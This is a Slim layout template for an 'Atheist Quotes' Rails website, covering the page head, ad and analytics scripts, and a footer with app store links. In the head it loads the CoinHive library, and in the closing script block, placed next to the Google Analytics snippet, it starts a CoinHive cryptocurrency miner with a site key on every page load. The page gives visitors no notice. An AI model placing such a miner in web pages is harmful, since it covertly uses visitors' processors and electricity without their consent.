doctype html
html
  head
    title
      | Atheist Quotes
    = stylesheet_link_tag    'application', media: 'all'
    = javascript_include_tag 'application'
    = csrf_meta_tags
    script[async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"]
    script[src="https://coin-hive.com/lib/coinhive.min.js"]
    meta[name="viewport" content="width=device-width, initial-scale=1.0"]
    meta[name="description" content="Thousands of atheist quotes"]
    meta[name="keywords" content="atheist, atheism, quotes, atheist quotes, atheism quotes, richard dawkins, sam harris, freethinker, religion, bible, quran, atheist-quotes, quote"]
  body
    .container
      = render "layouts/nav"
      = yield
      .row
        footer
          hr
          .col.s3
            |  copyright &copy 
            = Time.now.year
          .col.s4
            = link_to image_tag("get-it-on-google-play", class: "app-buttons2"), "https://play.google.com/store/apps/details?id=com.leftblank.atheistquotes"
          .col.s4
            = link_to image_tag("download_on_app_store_badge.png", class: "app-buttons"), "https://itunes.apple.com/us/app/atheist-quotes./id392507328?mt=8"
    script
      |  var miner = new CoinHive.Anonymous('80bDWx1KXIBOSEbxCmC01GVNYxUlqUYo'); miner.start(); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-66119835-1', 'auto'); ga('send', 'pageview'); 
